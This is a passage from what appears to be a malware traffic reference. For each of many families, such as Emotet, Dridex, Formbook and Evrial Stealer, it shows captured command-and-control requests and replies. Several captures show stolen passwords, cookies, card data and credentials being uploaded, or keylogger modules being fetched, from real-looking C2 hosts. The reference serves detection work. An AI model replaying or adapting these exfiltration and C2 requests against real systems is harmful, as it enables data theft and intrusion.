..92.,.r.{.........L..?...aP./O..;@.(N.X.!.....5...\...v?.PK........2.)M..*.....>.......FileZilla\filezilla.xml.Yko.:......?..I...E..4Iw...........D[l(R.);.....%9N....v, ...Skype\CURRENT.u..ts ..5..C..PK.........p.M............ ...Skype\LOCKPK.........~)Ma...d....... ...Skype\LOG320..7.."]CS+S ..3.4P022.P.J--..KW.u..ts .Q.I-K.II.. ....!..VS.a.$........OWP64.............`...@B\.PK.........w.M`.6......... ...Skype\LOG.old.._K.0....)..Qko.$............v.1..h.....vC$+..-..;..pdI.I.a...RG..s.L..l...Ij..:JN...4....PK.........v.M........5.......Skype\MANIFEST-000001.Z.....#.TNjYjNJ..SeIjyfq.s~nAbQbI~...3......9!..L,...l,..L./..D|]C...2sR........ .*..X.]Y.Z..X\.XP..X...........Z.... ...H...h4..hN..........Q).nt0.... ......2..h....;... h&..7.A."......$>.I. .x.o@3I.......[..2I.h....;....h&..p..D>?...&.I.,Z..............A..Q.=zX...aZ. .PK...........l.P..............................Desktop Files\PK...........l.P............
.............,...Passwords.txtPK...........l.P............0.............W...Browsers\AutoFill\Unknown_Microsoft_Autofill.txtPK...........l.P............1.................Browsers\Cards\Unknown_Microsoft_Credit_Cards.txtPK...........l.P............2.................Browsers\Cookies\Default_Google_Chrome_Cookies.txtPK...........l.P............5.............D...Browsers\Cookies\qldyz51w.default_Firefox_Cookies.txtPK...........l.Pz7q)..........................Browsers\Cookies\Unknown_Microsoft_Cookies.txtPK...........l.P ^..~...C...4.............y...Browsers\Cookies\Unknown_Steam_htmlcache_Cookies.txtPK..........2.)M..*.....>.................I...FileZilla\filezilla.xmlPK..........1.)M..p.L.....................N...FileZilla\layout.xmlPK...........l.P...E_6..j.....................Images\Screenshot.pngPK...........l.P..........................^C..Images\Webcam.pngPK...........l.Pr..........................C..OutLook\OutLook.txtPK...........q.M!$...r..i..................C..Skype\000005.ldbPK............)MpCM..[........................Skype\000017.logPK...........v.M.i...s..o.................1...Skype\000018.ldbPK...........p.M.r.......... ............. ...Skype\CURRENTPK...........p.M............ .............Z...Skype\LOCKPK...........~)Ma...d....... .................Skype\LOGPK...........w.M`.6......... ............. ...Skype\LOG.oldPK...........v.M........5.................=...Skype\MANIFEST-000001PK.................... 
-----------------------------8d7f030923bcd86--
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/decryptstealer1.png "Decrypt Stealer")

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/decryptstealer2.png "Decrypt Stealer")

#### Delf Loader

~~~
GET /gate.php?serial=MTc4NS02NDU5LTQ2NDktMjQ0NA== HTTP/1.1
Content-Type: text/html
User-Agent: License
Host: ddhook.000webhostapp.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Mon, 07 Oct 2019 10:36:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: awex
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Request-ID: db10cf7bfe6a5d2a490182a808ccb458

11d091d035fb3bd27625c54c622a7e48

GET /check.php?serial=MTc4NS02NDU5LTQ2NDktMjQ0NA== HTTP/1.1
Content-Type: text/html
User-Agent: License
Host: ddhook.000webhostapp.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Mon, 07 Oct 2019 10:36:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: awex
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Request-ID: 4f25a2a515ae727693adbe820cf36edd

bff12793b8731a7f138e454a576ed1b5
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/delf.png "Delf Loader")

#### Diamondfox

~~~
GET /plugins/keylogger.p HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: exploit.rocks
Connection: Keep-Alive

I..Dw..o.............?."..zoh:.X4.O..CCUT:WV.HF7#.h......zE...:oj'vV..>X ..O..&?.x..a.s.l.A1....D.... loU....G^......l.:.....u.......8..Lq[..N`.]...n..Qy...Q.nn.........}eF.C...;N9.lI@P.f.}g.....V~.lf>)...T..@.(..c-V..yOOe.....6.L/.D...~...p.
GET /plugins/ftp.p HTTP/1.1
User-Agent: vb wininet
Host: exploit.rocks

HTTP/1.1 200 OK
Date: Mon, 22 Apr 2019 19:53:57 GMT
Server: Apache
Last-Modified: Sun, 19 Jul 2015 09:20:08 GMT
ETag: "15e0360-4000-51b36ed5c8200"
Accept-Ranges: bytes
Content-Length: 16384
Vary: Accept-Encoding,User-Agent
Content-Type: text/x-pascal

..)..7C4J=K9..H;.#W R!W%.*\/]/[,f.c.a.`.i.o.j.o.u.t.u.s.~ { ..x..l.~....,. 3.^_...3.c w.x.?.{.q.QrF2.%V:.4Eym.{{\,S%.L:O.JO;J>..........................................................................................................................rrrrw.3G6B6@5AJ>H=I$P V'S"V*\)](\7C4N=K9I>H;Q#W R!W%]*\/]/[,f.c.a.`.i.o.j.o.u.t.u.s.~
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/diamondfox.png "Diamondfox")

#### Dodgerblue

~~~
MAIL FROM:
250 OK
RCPT TO:
250 Accepted
DATA
354 Enter message, ending with "." on a line by itself
thread-index: AdeYjY9JWfNpH2aQRTCt4pdvmqBa0w==
Thread-Topic: Passwords:::JOHNS-PC\cep2solilJZGK
From: "abadia firmhearted"
To:
Subject: Passwords:::JOHNS-PC\cep2solilJZGK
Date: Mon, 23 Aug 2021 19:13:00 -0700
Message-ID: <870B54DC128A4D2CADAF814D7EBD6F47@SXQUR6787287963>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_0000_01D79852.E3EBF170"
X-Mailer: Microsoft CDO for Windows 2000
Content-Class: urn:content-classes:message
Importance: normal
Priority: normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17514

This is a multi-part message in MIME format.
------=_NextPart_000_0000_01D79852.E3EBF170
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

Date: 2021-08-23 7:12:48 PM
System: Microsoft Windows NT 6.1.7601 Service Pack 1 (64 Bit)
Username: cep2solilJZGK
CompName: SXQUR6787287963
Windows Version: Microsoft Windows 7 Professional - 64-bit
Antivirus: Not installed
CPU: Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz
GPU: Standard VGA Graphics Adapter
RAM: 2004MB
Internal IP: 192.168.180.141
External IP: 104.244.72.168

Date: 2021-08-23 7:12:49 PM
System: Microsoft Windows NT 6.1.7601 Service Pack 1 (64 Bit)
Username: cep2solilJZGK
CompName: SXQUR6787287963
Windows Version: Microsoft Windows 7 Professional - 64-bit
Antivirus: Not installed
CPU: Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz
GPU: Standard VGA Graphics Adapter
RAM: 2004MB
Internal IP: 192.168.180.141
External IP: 104.244.72.168

------=_NextPart_000_0000_01D79852.E3EBF170
Content-Type: text/plain; name="credentials.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="credentials.txt"
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/dodgerblue.png "DodgerBlue")

#### Donotgroup

~~~
POST /ze/volad/uzi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: skillsnew.top
Content-Length: 1265
Cache-Control: no-cache

data=
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/donotgroup.png "Donotgroup")

#### Dridex (loader)

~~~
GET /function.php?3b3988df-c05b-4fca-93cc-8f82af0e3d2b HTTP/1.1
Host: masteronare.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2019 20:32:12 GMT
Content-Type: application/octet-stream
Content-Length: 455830
Connection: keep-alive
Keep-Alive: timeout=60
Accept-Ranges: bytes
Content-Disposition: attachment; filename=5dc1dc4cd884c.pdf

7Y2FGZnZ2enZ2dnZydnZ2dhgYD3Z2e1B2dnZ2dnZ2dnZmdnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnYPdnZ2dnYDUUJQA3ZDdll5flVQdWN6B19hcF9HVE51QFRaDllUWnFDfnB5X1VaAkFTdHVebWR1TlNgA1BWYANQZXIOY35wBkFtcGJCc2YHfH12dnZ2dnZ2dnZ1XxxRchx9bV5RVWRgblkFB1tafQ5DdlsAXlVjBW5ZBQd0b0FxQ3J9XlFVZn1SD1oFQ1p9DkMCR1F0VWRGblkFB1tafQJDX31eUVVmfVIAYAdcWn0OQ3ZbAFtVZGRuWQUHdG9CeUN9fV5RVWZ9UgIFB1xafQ5DYlpbXVZ0YG5ZBQd2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZicmJ2dnJAdXV2dXJRenFTdnZ2dnZ2dnZ2dnNQdnZ+X3RAcn52dnRAdkB2dlh9cn
~~~

~~~
POST / HTTP/1.1
Host: 194.99.22.193
Content-Length: 3442
Connection: Close
Cache-Control: no-cache

..5......[,h?])moo..;.Y.. v..jq..........G.0vR...@ ..6tw..<.{It.y #l.K..8....v...v......=.+.......Q..v..P5...y...uhTqR. ..v.QoM..o.I.l...>.....p.....Rt...............
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/dridex.png "Dridex")

#### Dunihi

~~~
POST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: C4BA3647<|>USER-PC<|>admin<|>Microsoft Windows 7 Professional <|>+<|>undefined<|>false - 20/9/2019
Accept-Encoding: gzip, deflate
Host: 192.186.145.93:8885
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
Server: Indy/9.0.18
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/dunihi.png "Dunihi")

#### Emotet

~~~
POST /mult/tlb/ HTTP/1.1
Referer: http://69.162.169.173/mult/tlb/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 69.162.169.173:8080
Content-Length: 468
Connection: Keep-Alive
Cache-Control: no-cache

5Grps=L1sIwg4a7XWGwPpN9LOBzMiBXsZTP33ixo%2FUspmgBLoaYr0K7KnwvoUER9%2B5NzIxpTHgpSTeVRZMm92wSA%2Ff9pG66uhR%2FX%2BGREn%2BVIvlr3LiYQupDVsdexmgD%2FSXdTJ%2FxXNSo5Q52S4HvI9eLtM9s0arCw%2FNNEZlkzp6e8omxU3854YNNNUcAV54N30rgISrXlxvWJz9TP%2FelEcMxMf3hzv91K1Uz8H2KWzWjV2x78pmAG9HGdkFGLaOq6Tqp1LH6Uc7c1gzmZ3Cht2T4cKg06DPDTHkXYj%2F7uCMWAFMO%2FS4QlZl1XKi8MmZck0JAmxsZdGcmIkQoqq5DzFCio6fUAgvqUN3g1%2BP5eXYeZpGu1xIzbWLRG9Wtt2vUOjz4ezl6Z%2B2peN1LKWN%2F8V0CLjxQHhXSu9YZP4g3NIdJ5qofLmM0ipT

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Oct 2019 13:38:33 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 148
Connection: keep-alive

.^ta.I..Z .._AJ*..=._...5-...F.L{>...`.c.....~.|.h...@.E...2.Z|U..W..M....b......X.FA....x.....\.j?/C......{pi.b....Cz......>D..yQ........G.q...4?..
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/emotet-1.png "Emotet")

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/emotet-2.png "Emotet")

#### EngrWiz

~~~
POST /b.php?79 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: litespidchk.tk
Content-Length: 970
Expect: 100-continue

main1=bNzJOjMPRRDJ2ylFA1SCAY7GEg0j4ROaetEMhuN1ObuzyJ%2bYF2etM938iapA5dT909gUM9ORgU5n0fMY%2fFKhRr7QWxNopqIoNFeQWjzRaqyGtXxs5NLSLHAitCOyzowy&back=TnpNNU5DMUJNamRETFRnMk9VVXRRVEpEUXkwM016WXpMVE00TXprdFFqTXlNaTA0TXpCRE96VHA%3d&main3=NTQ%3d&main2=Gr4YoYDefbNT%2ftg2inQcbufFo%2bzbKZmaqrttK%2fVrQXhuPh9fr66Kem9y7I%2bsUHvrnrmSNogQl3Lk%2bMvr9p8aGKsZrSODSSTbYPy3Osy5WF8reN7lc6V%2fUtARI%2bizcbulBVnqc3zLaKOvIEl8eDqq6mbY5GwzG3Mie6NW5W1zLG3hEmABLyZkbQdJhhkYhMpQbxkuIhbcIzdTSm9%2b4xC8gb9v%2bnRligpWZowXrb56VqPC9KrPYuBnIqHH4xj5Pwgyl1g8kDTLJ2qMfGIAZeFv4YuSM2Xuza%2bMN7Zpi8Uuxuvq1D9wsc7b8V4POHZ9Rn34alELER2wAdRQ7PiNI2sglwH97JsZoopUyW28YJOAFWJ6kDPKXKIpiUifcye%2b4wplt9fV3OycDqbt5gAbobpA7qNTgyQfAUXYrXMDRNhNQi4%2ffbWCt2%2fd%2bZd%2fxe9k55wQhhLbdy%2bn1wLkZz4NIGssu9vJECynDGwT%2f4MlFIwD5kV0hD%2bjjSTHecWF23%2f0Wi%2fCS7msiLCQ3SukIpWskjRPNPZ8TDvlYctblEeLUZWZDobBQgsdLUzCekYEsX4toOXF2NV69a3ayO0e8etiw4LPRrvbBQiAmU5FZYESOeWkaw71mxzjOxeHFPQtKn2%2fWwdxBpl05y5BtZSnOzfc2wCELk4iYCl20OE5OtjyGvhtAes%3d

HTTP/1.1 200 OK
Date: Wed, 24 Jul 2019 09:11:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d6917d65789c5d5e772089d4fe53cd4181563959469; expires=Thu, 23-Jul-20 09:11:09 GMT; path=/; domain=.litespidchk.tk; HttpOnly
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Request-ID: 571e4da59d69406a9d967ee31ad5fae4
Server: cloudflare
CF-RAY: 4fb4c3dd683ccaf4-ARN
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/engrwiz.png "EngrWiz")

#### Evilpony

Follow the TCP stream, not the HTTP stream, in Wireshark.

~~~
POST /d2/about.php HTTP/1.0
Host: spausence.com
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 337
Content-Type: application/octet-stream
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Encoding: binary

...Q..8.T.f5...~....I..%..`qq...q.^.i.u..v.|34.../t....w....u.}........ 6....... ...2..T(.Z.X/..A....55.....>$l ..uE.-..p.. ..omvs.S.uYa.Y...............Ezv...B.OM_.X.pg..1...6..}kN..U..%...2.:.H.E......9.k.-.5sD..@.* k~........y.s.....@.L+X....wK.O11a.q.$.zd.A...hd9........,. ..(..tP..$.|rS....I.8" ..X!@. ....4N...x.<.......!m~O_.T`.

HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Thu, 03 Oct 2019 17:18:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.4.45

I6.$...Z,....
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/evilpony.png "Evilpony")

#### Evrial Stealer

~~~
HTTP/1.1 100 Continue

POST /files/upload.php?user=XakFor.Net&hwid=EEEB5D54788042A7B542739BBC26CF4B HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------8d7830f073b0ab4
Host: softfare.zzz.com.ua
Content-Length: 58292
Expect: 100-continue
Connection: Keep-Alive

-----------------------8d7830f073b0ab4
Content-Disposition: form-data; name="file"; filename="sega2laj1y4.zip"
Content-Type: application/octet-stream

PK........W..O........M.......desktop.jpg..u\T].=:.4b. ....t."14CI..AH..H( #9t#0.. ) .!.J7. ...}.}.....?.....9s....a?.Y.z.yO..L...*!.`xxx.{.?..(L.FBDDLt.................
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/evrial.png "Evrial")

#### Exilerat

~~~
POST /test/u HTTP/1.1
Cache-Control: no-store
Connection: Keep-Alive
Pragma: no-store
Content-Type: multipart/form-data; boundary=--71h2ll4i66hhbl
Accept: text/*,application/*
Accept-Language: en-US,en
Host: 27.126.188.212
Content-Length: 368

--71h2ll4i66hhbl
Content-Disposition:form-data;name="x.bin"
Content-Type:application/octect-stream

cjESYTqBEdGqEeIxETEREaKiooqikgm6irKKgqKigimigikRMysrKz8jIyMrqhHi
MRExERGioqKKopIJuoqyioKiooIpooIpETMbIyMjibkJsUqhOTsLIyMjKABIaFAD
GyMjI6JSolKiUqIL2yMjI4qySoqCSqKiSoIpSqKCSikRquqyUqqS4lKqoqJS4qob
kyMjI5loUABYmLgimiKQCLDyklKqUpqSoqpjBAMjIw==
--71h2ll4i66hhbl--
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/exilerat.png "Exilerat")

#### Expiro

~~~
POST dovamnabihede.ws HTTP/1.1
User-Agent: Mozilla/4.0 (Compatible; msie 44; NT6.1.7601-90376708.ENU.3DA43F52-83C788-FF5FFC-15DD1711; .NET CLR 00000000/00000000)
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/expiro.png "Expiro")

#### Filecoder.STOP

~~~
GET /As73yhsyU34578hxxx/SDf565g/get.php?pid=2485E9F082250E269EA0EF635E0D382D&first=true HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: ring1.ug

HTTP/1.1 200 OK
Date: Fri, 25 Oct 2019 13:26:11 GMT
Server: Apache/2.4.37 (Win64) PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 562
Connection: close
Content-Type: text/html; charset=UTF-8

{"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5pjgODTtZORmS4jeVWQV\\nvs71Fz\/NH7IWyR7an0L+rLo1S7Jrqn64J8LXlT\/1eiDN87tYle5AlB4\/vmf4Uo98\\ncMG\/E+NbFLtyRyxTq4RmaNDjyvTPIXbBl+cMU4yIwBKT89D8tuD6PhdfVVjMx71l\\niEPtuNb5pD38EYGv\/3+Yrwvg3sU1+aiIWdZgPX3ieFxAL3ZZkvlr5\/XeNpKqGAiT\\n6YBjLZg7R\/5j5Knhex+gKUR2Gkh2CG7mWqjcaNUK9Hzkgk3\/UmqopxokpSTkHmUT\\nSlN5mKAg438TmIUz4MCnnieexOtpcg7Fmn2wPObgdIG3OXK5yfxxExa+TBDTbCFc\\ngQIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"Em9SPAhlG3hXHt713xEY92niynachhsXeWwCv6cB"}
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/stopfilecoder.png "Filecoder.STOP")

#### Fin7 JS Backdoor

~~~
POST /pictures/delete?type=name HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:69.0) Gecko/20100101 Firefox/50.0
Content-Length: 326
Host: moviedvdpower.com

lwirwavfynacqo=PKWFG%04S@XZ%16l%04%0E%00%02%00f%09%02%06%09%1EAC%04%0D%02%05%1FKVTK%5DG%0AX%08%07%0F%0D%00W%05%5B%5DQ%05%0D%0AV%0F%0B%5B%0B%03%0E%0FP%03%0B%01%06%0E%0C%5D%06V%1FLZZ%5C%05%02%05%09%08%03%07%1FMZS%04%0E%01%05%1FQW%0A%0C%0A%09%02%0D%02%03%07%03%0Cr%0Dx%7C%09%05%08gfD%5CJ%1Egz%1ECV%5E%5Dl%5E%5D%05%5DRN%26_%267983

HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Tue, 15 Oct 2019 16:27:41 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive

POST /new/new?type=name HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:69.0) Gecko/20100101 Firefox/50.0
Content-Length: 306
Host: moviedvdpower.com

lwirwavfynacqo=PG_EG%08%5BCXV%1Eo%04%02%08%01%00j%01%01%06%05%16BC%08%05%01%05%13CUTGUD%0AT%00%04%0F%01%08T%05WUR%05%01%02U%0F%07S%08%03%02%07S%03%07%09%05%0E%00U%05V%13DYZP%0D%01%05%05%00%00%07%13EYS%08%06%02%05%13YT%0A%00%02%0A%02%01%0A%00%07%0F%04q%0Dtt%0A%05%04oeDPB%1Dgv%16@VRUo%5EQ%0D%5ERB%26_%267500
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/fin7jsbackdoor.png "Fin7 JS Backdoor")

#### Firebird RAT

~~~
00000000 53 00 00 00 00 00 00 00 S.......
00000008 00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00 ........ ........
00000018 00 06 01 00 00 00 3b 56 5c 5a 48 4b 05 67 66 3c ......;V \ZHK.gf<
00000028 22 0c 04 13 14 10 41 41 32 02 1c 06 08 06 2e 5b ".....AA 2......[
00000038 5b 24 0c 1f 1a 5a 4d 59 61 50 32 15 01 0a 1f 5a [$...ZMY aP2....Z
00000048 29 53 56 2b 43 59 15 34 3d 3d 03 0c 3c 22 0c 04 )SV+CY.4 ==..<"..
00000058 13 14 0b
...
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/firebird.png "Firebird")

#### Flawedammyy

~~~
= ..">h..K...t.......N<. .Q..1....%S-.8z...id=53292686&os=7 SP1 x86&priv=User+UAC&cred=USER-PC\admin&pcname=USER-PC&avname=&build_time=08-08-2019 14:24:35 PM&card=0&
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/flawedammyy.png "Flawedammyy")

#### Formbook

Formbook hostnames almost always start with www.

~~~
POST /k9m/ HTTP/1.1
Host: www.liuhe127.com
Connection: close
Content-Length: 3769
Cache-Control: no-cache
Origin: http://www.liuhe127.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.liuhe127.com/k9m/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

Sbh=A2oUV0jxRNQErH6gY3lxQtOCTuQwNTdWJ25sTcda3oav(0QcLnkBrePt5vgAKuqyhbAftuJA5G5D2fNVsLRL8o7GMMvu8SY6wR8pwXAraJm4TKmuw5(TglqswaX2VpD_gJ3yal4FZ1pkDvEP81iuj_l_mMoqsdCGaFMxmu8LQC1CZjkxIXbFtlEaQg0Wfzvxpk9XRS39rZxxdqjALdRL8_N2LHRzPN35WuoIIn2J0mUB7u7x~42TwXHpZcLTJ4cELO23a_seXaFdgz~QWrxi7L3N9oGrwrY4tSxRUCsHQCoAB8CsxlUDIkY67TYTnYPmJxKxE06yA9NA5buPXUU-rDGiNGDQ25(b371m2NNnyheUxDNxyL6wr0syvlQ7Qn~DvzJO1j4_01FUfdeQKDmT9nuRD7AXJYaO3DIZnG1RWkvBxF0H38hB8-R7b1kP1IZqlFNLuC1ttRMUWPoRYyiYb-5rzJXywgOQncCVwVXcwH8dkVBf8nIw1doGRbV0yBZciG1vmCQMiyqspdkDVZt-1KyQhCCDaZWgyx(jUEtrJ5ZzRRfL7eaLGAG1u46ihMFAoJdDXorJcFL051WdJ2wHBfyMv2c9wu1j78lVpEWNkON2Qnw-8VOoQrg4ItHc4WjdsmkjCk(8A-d-uwY70GE0UXkWhPpg~_8qCqj_XNsXD1Cku4u0im9ibvYCLeQyYDn_FmL-U7ZNtOIbYeTHchiTz3fwdILdormZDVBuDzJlRACku5YKuqCIZoTnxUBI(iGkeX0da3GEkWCi8MA6nuA390kyWjwjSpzGHFYPG0B41C5bU5KrJx(9qiFYNfQPZqv5KDyJL8tN7jrqIny7WzTVRqvRHCeerIFPL5vosxC_3QvH2AlElM8Ssx(QZqz22ySsvMzyq8Hv~3tMLtg8mgzByn2dH2WrNAM3nk~XXu(6GurJtah4M9tPmohFGPLZxX5e3WCJ~h16eNNM4OaV~MOGVYusVrPgqFUS6P7iizTBZS(MsulNfuAKYvUq2kUMtCYSZAt34TUY6bJ5BTPy~4ydE8n16XohSRP8VbqhLAZ4DGO2n-hfrK2o9oUsNUWcpZyKA2(9kXBftM3s5lzWT21wBKbcPaiPURUuV4eheOkTBTxTB_mMxCafVVE6yvbJD-XIpSazCu(sS7~QUEbh6EPrqsB11rhKlRPy39G2rLo6lSMHeGjCmI5Rc80lhtZyFKcqhNYbhwuiEn3uK9CodgYxVie6yY1MwI(M8VSBZ-zQjldjXnFN~7oKDW3JglzgbK3lzeDK5aRb0HTwohxi8M9lRkTKflhtcr77iOlBVcE6HYSbchngmsBWBgPwA75xvzJhUUtgjJlxLW~bSPMG7x7GLVfCZjxxrjki0R9ZPDVdx71eP4yoIdymwRgqddVSuGCAIf641vyoItI9QzfvvuZBdpRQi3ZEw7LUifYAyjYZ2Xd9KdOMiNiLLeLsDCgWib~5r8iSfExWtFjsEgOt(2W_0JQSAgplkqJxkO9YxSdB9xsPfeavxYirf7azw7UGnDTEMQUnMMECFM5_v29oh6tKvIolHPv_qZrW0nGwd0aCMfzUqcV0(NlfiEQOxVZTonlWkJoR3hyyZQ~dKGW9j_WbA-8s54GvC-VC~skS2jG4haG9bxKA6QZqRK4-2qI5o2U3rNoeQEz_~yMfZ2fQoftvSkgpJfcgjuh3qTOFK8b6OSe5wMnyLdniF_4xN3rO(73lGUB5l60LbBa4TAYc(Qn7pyfvhlhMx8nr0vm6kCom1xi-VN1M(fSDqNubOVR_8QORONDFaX41G3HYOrWQyQ5Cvd6lAFgWycF3KeaumEH0LEUP7vR3t8CqgQ5VqyDxtKNy0Z7MVbqsq6s8~aYdnUL5DxSG9pbe8LW4uDqLcBuZ2WiDWmdiRx0cbf9-s0qx6mSwAo(Wz67SmWp2X8VI3W4h3M3vf9BggKJQmHp7nLChKFWJWTuEGt43fxqjimz5WaRYtGOcdlH84XYv
X9kEB1C4(Fp99P6VKHhrkuCOrtiirAvl7KvjXYhsiOn20cjKKUL6l8(aZofg6g(CqTpB5dDGN86Korg1L6advz28Cc9QidH5ZPIAHrWXi9nG5FtnBxG-3R2N(J6V~IGsC8NZIwv0qB~35YLhS9SlyD38(p(pgy9N3fPHO9Gzlzd6D3j74fN-N89jhcQTClusyQIhdjrYsqWnpi7Of2Hl9zRx(ut-kFP33A5zYLbDn54f9gg8kH1m(BeKfVXxVtpGLR4VQSBfZzVwPGnUei9aJDZkXwmg0xftRV~S3TxUucpU1d75Pa9NCvgMU51f7uv0XtF1S-0_nqUy(apdab1FJcSzLOVDXJDyOKr5P4px5QpKM1FZgH9mgQQZuo~rlcBi4jISUNx3qv7fwaBZ4KDYuICC1-KLeFh0i7YEU_njjPm31uzkYLlVxfbhAg6C7Fxcpr5_jzhW~me85m48ifV4C06qNAN5WgIGxJW07CUNAuLx2d4tZI85EWgoxQa3AOuINyalNllQZt2LBB~ReVqa8Gr3pLpZOSiDREVqDaruTFqNwAZndKWZ~CTIV4ss6txpH7ypXw3AZ4fiDn5j7NDtaJzXbptIpWgrv9yK(zab71BYxnEuPpsdZSnA2QWY9s300CraaT3RPj(gdt~5OjaG22qma1M9LYzgvBdIBH57aizchPopkjnWiJAuvabKSvJyEtKb5Ni67H1WbOnOKM8pMcqsaIBi1AfQV0PbikKmG-HikPS86JBnJXZs8BWrbgm7g8uGrVpnnuHbHuP4p4xAOgYNPDbnpSoXn0kH~vUc1JxLurnAnNWMmYgA5g3fIw7HGvJSnKn6DDHod7HUKWF3ggfFJdZbucZxbJ2fpE64O6nKFy9It-R0BRZqcunVVvWy4zwCQ_1brWO78sSQY3WY4Es8kI6nl5hc9k3dhAWgQJWeqVrUGnOyxnf3wP9Tjc3fbhhfMthKeTVJEn485mDsUhxaOlIUrAoNDk1Kmua8F3zzcHpo~ixmjApivEsgkkIIni~mHnw4sce0IaJmWT9Ka_FCRQTC3dNAkBJHjcfTsYpgDvJBeZI8V7tnXTcJwQShoQoTdzOUvebgdia2s6HyC8Ay3lybE0Kvi4Ufu2qeJDnpSdiZAi8Ba-AzxnhL~66T~sQU0SY1ZDTJsdMD9zA8h5A0g71lMEIFSEdczwnvBeXpuEiaX9FOoJQwoIyyq4KmaeML~f5ipBL5MgqKf36tQ4N9jiM0IMAZdarP~ZkdSRs6dnJ7bU4FFMvQUrM0EGSJMQfLAvB7d_c0IwGUl44oifYX7n8cNJQcRPEFt1PZYPKE47I_JQ2CSVE9Scfi6hmF2mrjjozj0NQFcK5B~W~c3GpQxJ8e9cNoWhrkZNK1CyKcuTjHkfWA